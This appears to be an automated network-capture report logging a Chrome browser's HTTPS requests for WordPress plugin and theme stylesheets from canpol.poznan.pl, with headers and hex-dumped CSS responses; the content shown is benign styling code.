                                                            2025-01-15 10:07:55 UTC7912INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 23 73 74 61 72 74 2d 72 65 73 69 7a 61 62 6c 65 2d 65 64 69 74 6f 72 2d 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 61 75 64 69 6f 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                            Data Ascii: @charset "UTF-8";#start-resizable-editor-section{display:none}.wp-block-audio{margin:0 0 1em}.wp-block-audio figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-audio audio{width:100%;min-width:300px}.wp-block-button__link{color:#fff;background-color:#
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 6f 70 61 63 69 74 79 3a 2e 31 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 32 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 32 30 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67
                                                            Data Ascii: opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-backg
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 2d 73 69 7a 65 3a 32 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 3b 7a 2d 69 6e 64 65 78 3a 31 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 38 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 2e 34 34 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 2e 61 6c 69 67 6e 6c 65 66 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 2e 61 6c 69 67 6e 72 69 67 68 74 2c 2e 77 70 2d 62 6c 6f 63 6b 5b 64 61 74 61 2d 61 6c 69 67 6e 3d 6c 65 66 74 5d 3e 5b 64 61 74 61 2d 74 79 70 65 3d 22 63 6f 72 65 2f 65 6d 62 65 64 22 5d 2c 2e 77 70 2d 62 6c 6f 63 6b 5b 64 61 74 61 2d 61 6c 69 67 6e 3d 72 69 67 68 74 5d 3e 5b 64 61 74 61 2d 74 79 70 65 3d 22 63 6f 72 65 2f 65 6d 62 65
                                                            Data Ascii: -size:2em;line-height:1.25;z-index:1;margin-bottom:0;max-width:840px;padding:.44em;text-align:center}.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embe
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 2d 6f 66 2d 74 79 70 65 28 33 6e 29 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 33 6e 29 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 34 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 34 6e 29 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 34 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 34 6e 29 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 35 20 2e 62 6c 6f 63 6b
                                                            Data Ascii: -of-type(3n),.blocks-gallery-grid.columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid.columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid.columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid.columns-5 .block
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 68 61 73 2d 6d 65 64 69 61 2d 6f 6e 2d 74 68 65 2d 72 69 67 68 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 5f 5f 6d 65 64 69 61 7b 0a 20 20 2f 2a 21 72 74 6c 3a 62 65 67 69 6e 3a 69 67 6e 6f 72 65 2a 2f 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 67 72 69 64 2d 72 6f 77 3a 31 0a 20 20 2f 2a 21 72 74 6c 3a 65 6e 64 3a 69 67 6e 6f 72 65 2a 2f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 2e 68 61 73 2d 6d 65 64 69 61 2d 6f 6e 2d 74 68 65 2d 72 69 67 68 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 5f 5f 63 6f 6e 74 65 6e 74 7b 0a 20 20 2f 2a 21 72 74 6c 3a 62 65 67 69 6e 3a 69 67 6e 6f 72 65 2a 2f 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 31 3b 67 72 69 64 2d 72 6f 77 3a 31 0a 20 20 2f 2a 21 72 74 6c 3a 65
                                                            Data Ascii: has-media-on-the-right .wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:2;grid-row:1 /*!rtl:end:ignore*/}.wp-block-media-text.has-media-on-the-right .wp-block-media-text__content{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1 /*!rtl:e
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 68 61 73 2d 63 68 69 6c 64 3a 6c 61 73 74 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3e 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 68 61 73 2d 63 68 69 6c 64 3a 6c 61 73 74 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 74 65 6d 73 2d 6a 75 73 74 69
                                                            Data Ascii: nu-container>.has-child:last-child .submenu-container,.wp-block-navigation.wp-block-navigation.items-justified-space-between>.submenu-container>.has-child:last-child .wp-block-navigation-link__container,.wp-block-navigation.wp-block-navigation.items-justi
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 7d 2e 69 73 2d 76 65 72 74 69 63 61 6c 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 7d 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 63 65 6e 74 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                                                            Data Ascii: display:flex;flex-wrap:wrap}.is-vertical .wp-block-navigation__container{display:block;flex-direction:column;align-items:flex-start}}.items-justified-center .wp-block-navigation__container{justify-content:center}.items-justified-right .wp-block-navigation
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 63 6f 6d 6d 65 6e 74 20 74 65 78 74 61 72 65 61 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 72 65 70 6c 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 34 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 69 6e 70 75 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 74 65 78 74 61 72 65 61 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 34 39 34 39 34 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73
                                                            Data Ascii: ost-comments .comment-form-comment textarea{box-sizing:border-box;width:100%}.wp-block-post-comments .reply{font-size:.75em;margin-bottom:1.4em}.wp-block-post-comments input,.wp-block-post-comments textarea{border:1px solid #949494}.wp-block-post-comments
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 67 6e 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 31 73 20 65 61 73 65 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 72 65 64 75 63 65 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 7d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c
                                                            Data Ascii: gnright{justify-content:flex-end}.wp-block-social-link{display:block;border-radius:9999px;transition:transform .1s ease;height:auto}@media (prefers-reduced-motion:reduce){.wp-block-social-link{transition-duration:0s;transition-delay:0s}}.wp-block-social-l
                                                            2025-01-15 10:07:55 UTC8000INData Raw: 3a 23 31 64 61 31 66 32 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 76 69 6d 65 6f 7b 63 6f 6c 6f 72 3a 23 31 65 62 37 65 61 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 76 6b 7b 63 6f 6c 6f 72 3a 23 34 36 38 30 63 32 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 77 6f 72 64 70 72 65 73 73 7b 63 6f 6c 6f 72 3a 23 33 34 39 39 63 64 7d 2e 77 70 2d 62 6c 6f 63
                                                            Data Ascii: :#1da1f2}.wp-block-social-links.is-style-logos-only .wp-social-link-vimeo{color:#1eb7ea}.wp-block-social-links.is-style-logos-only .wp-social-link-vk{color:#4680c2}.wp-block-social-links.is-style-logos-only .wp-social-link-wordpress{color:#3499cd}.wp-bloc


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.1649708178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:54 UTC626OUTGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:55 UTC277INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:49 GMT
                                                            ETag: "a50-620a8ec37fdb8"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 2640
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:55 UTC2640INData Raw: 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 0a 2e 77 70 63 66 37 20 66 6f 72 6d 20 2e 77 70 63 66 37 2d 72 65 73 70 6f 6e 73 65 2d 6f 75 74 70 75 74 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 30 2e 35 65 6d 20 31 65 6d 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 2e 32 65 6d 20 31 65 6d 3b 0a
                                                            Data Ascii: .wpcf7 .screen-reader-response {position: absolute;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);height: 1px;width: 1px;margin: 0;padding: 0;border: 0;}.wpcf7 form .wpcf7-response-output {margin: 2em 0.5em 1em;padding: 0.2em 1em;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.1649710178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:54 UTC617OUTGET /wp-content/plugins/fancy-box/jquery.fancybox.css?ver=1.2.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:55 UTC278INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:38:27 GMT
                                                            ETag: "10c9-620a8ae145c94"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 4297
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:55 UTC4297INData Raw: 64 69 76 23 66 61 6e 63 79 5f 6f 76 65 72 6c 61 79 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 33 30 3b 0a 7d 0a 0a 64 69 76 23 66 61 6e 63 79 5f 6c 6f 61 64 69 6e 67 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0a 09 77 69 64 74 68 3a 20 34 30 70 78 3b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20
                                                            Data Ascii: div#fancy_overlay {position: fixed;top: 0;left: 0;width: 100%;height: 100%;display: none;z-index: 30;}div#fancy_loading {position: absolute;height: 40px;width: 40px;cursor: pointer;display: none;overflow: hidden;background:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.1649709178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:54 UTC632OUTGET /wp-content/plugins/wp-ultimate-gallery/assets/css/wug-gallery.css?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:55 UTC279INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:21 GMT
                                                            ETag: "2875-620a8ee15a473"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 10357
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:55 UTC7913INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 69 63 6f 6d 6f 6f 6e 27 3b 0a 20 20 20 20 73 72 63 3a 20 20 20 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 69 63 6f 6d 6f 6f 6e 2e 65 6f 74 3f 75 6b 76 62 72 63 27 29 3b 0a 20 20 20 20 73 72 63 3a 20 20 20 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 69 63 6f 6d 6f 6f 6e 2e 65 6f 74 3f 75 6b 76 62 72 63 23 69 65 66 69 78 27 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 0a 20 20 20 20 20 20 20 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 69 63 6f 6d 6f 6f 6e 2e 74 74 66 3f 75 6b 76 62 72 63 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 0a 20 20 20 20 20 20 20 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73
                                                            Data Ascii: @font-face { font-family: 'icomoon'; src: url('../fonts/icomoon.eot?ukvbrc'); src: url('../fonts/icomoon.eot?ukvbrc#iefix') format('embedded-opentype'), url('../fonts/icomoon.ttf?ukvbrc') format('truetype'), url('../fonts
                                                            2025-01-15 10:07:55 UTC2444INData Raw: 41 63 74 69 6f 6e 20 3e 20 2e 6c 53 50 72 65 76 20 7b 6c 65 66 74 3a 20 32 30 70 78 3b 6f 70 61 63 69 74 79 3a 20 31 7d 0a 2e 77 75 67 2d 77 72 61 70 70 65 72 3a 68 6f 76 65 72 20 2e 6c 53 41 63 74 69 6f 6e 20 3e 20 2e 6c 53 4e 65 78 74 20 7b 72 69 67 68 74 3a 20 32 30 70 78 3b 6f 70 61 63 69 74 79 3a 20 31 7d 0a 2e 77 75 67 2d 77 72 61 70 70 65 72 20 2e 6c 53 53 6c 69 64 65 4f 75 74 65 72 20 2e 6c 53 50 61 67 65 72 2e 6c 53 70 67 20 7b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 35 70 78 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 6f 70 3a 20 30 3b 0a 7d 0a 0a 2e 77 75 67 2d 77 72 61 70 70 65 72 20 2e 6c 53 53 6c
                                                            Data Ascii: Action > .lSPrev {left: 20px;opacity: 1}.wug-wrapper:hover .lSAction > .lSNext {right: 20px;opacity: 1}.wug-wrapper .lSSlideOuter .lSPager.lSpg { line-height: 15px; margin-right: 5px; position: absolute; right: 0; top: 0;}.wug-wrapper .lSSl


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.1649707178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:54 UTC643OUTGET /wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.css?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:55 UTC278INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:19 GMT
                                                            ETag: "159e-620a8edf8683b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 5534
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:55 UTC5534INData Raw: 2f 2a 21 20 6c 69 67 68 74 73 6c 69 64 65 72 20 2d 20 76 31 2e 31 2e 33 20 2d 20 32 30 31 35 2d 30 34 2d 31 34 0a 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 61 63 68 69 6e 63 68 6f 6f 6c 75 72 2f 6c 69 67 68 74 73 6c 69 64 65 72 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 20 53 61 63 68 69 6e 20 4e 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 2a 2f 2e 6c 53 53 6c 69 64 65 57 72 61 70 70 65 72 2c 2e 6c 53 53 6c 69 64 65 57 72 61 70 70 65 72 20 2e 6c 53 46 61 64 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 53 53 6c 69 64 65 57 72 61 70 70 65 72 20 2e 6c 53 53 6c 69 64 65 2c 2e 6c 53 53 6c 69 64 65 57 72 61 70 70 65 72 2e 75 73 69 6e 67 43 73 73 20 2e 6c 53 46 61 64 65 3e 2a 7b 2d 77 65 62 6b 69
                                                            Data Ascii: /*! lightslider - v1.1.3 - 2015-04-14* https://github.com/sachinchoolur/lightslider* Copyright (c) 2015 Sachin N; Licensed MIT */.lSSlideWrapper,.lSSlideWrapper .lSFade{position:relative}.lSSlideWrapper .lSSlide,.lSSlideWrapper.usingCss .lSFade>*{-webki


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.1649713178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:55 UTC606OUTGET /wp-content/themes/salient/css/rgs.css?ver=6.0.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
